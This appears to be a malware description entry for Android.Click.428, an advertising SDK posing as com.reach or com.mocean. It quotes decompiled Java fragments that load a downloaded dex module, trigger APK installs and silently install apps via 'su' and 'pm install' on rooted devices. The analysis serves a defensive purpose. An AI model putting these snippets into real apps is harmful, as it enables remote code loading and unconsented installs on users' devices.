SHA1:
- SHA1: 15551a50d5a8b83b531748a3d84dd6d1c7e64d03
The advertising platform (SDK), built into Android-applications. It can disguise itself under the name com.reach or com.mocean. Upon launching, Android.Click.428 downloads the main module reach-sdk.zip from the management server (it is detected as Android.Click.173.origin) and connects it using the DexClassLoader class:
Log.b("Loading dex : " + dexPath);
dexClassLoader0 = new DexClassLoader(dexPath, arg11, null, classLoader);
class1 = dexClassLoader0.loadClass(((String)object0));
Android.Click.428 is able to install applications:
Context ctx = this.a.ctx;
File file = this.b;
Intent intent = new Intent("android.intent.action.VIEW");
intent.addFlags(268435456);
intent.setDataAndType(Uri.fromFile(file), "application/vnd.android.package-archive");
ctx.startActivity(intent);
In some versions of Android.Click.428 it is possible to silently install programs if the mobile device has root access:
proc = Runtime.getRuntime().exec("su");
dos = new DataOutputStream(proc.getOutputStream());
dos.writeBytes("pm install " + file.getAbsolutePath() + " \n");
dos.writeBytes("exit \n");
dos.flush();
Log.a("Installed : " + file);